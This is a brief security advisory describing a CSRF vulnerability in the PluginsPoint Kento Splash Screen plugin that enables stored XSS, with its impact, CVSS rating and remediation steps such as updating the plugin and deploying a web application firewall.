A high-severity Cross-Site Request Forgery (CSRF) vulnerability in PluginsPoint Kento Splash Screen allows for Stored XSS, potentially enabling an attacker to compromise user sessions.

The plugin is vulnerable to Cross-Site Request Forgery (CSRF). An unauthenticated attacker can trick an authenticated administrator into executing a crafted request that injects a persistent malicious script (Stored XSS) into the splash screen configuration, which is then served to site visitors.

Rated as High severity with a CVSS score of 7.1, this vulnerability poses a significant risk. An attacker can use this flaw to execute arbitrary JavaScript in the browsers of every user who sees the splash screen. This could be used to steal session cookies, capture credentials, or redirect users to malicious websites before they even reach the main site content.

Immediate Action: Update the PluginsPoint Kento Splash Screen plugin to the latest patched version from the vendor to eliminate the vulnerability.

Proactive Monitoring: Scan the website's splash screen configuration and related database entries for any unexpected behavior or injected scripts.

Compensating Controls: Implement a Web Application Firewall (WAF) to block CSRF attempts and filter requests containing XSS payloads, providing a crucial layer of defense.

Public Exploit Available: false

The ability to inject persistent malicious code into a site-wide element like a splash screen is a critical security issue. Given the High severity rating, immediate action is required. Administrators must update the plugin without delay to protect the website and its users.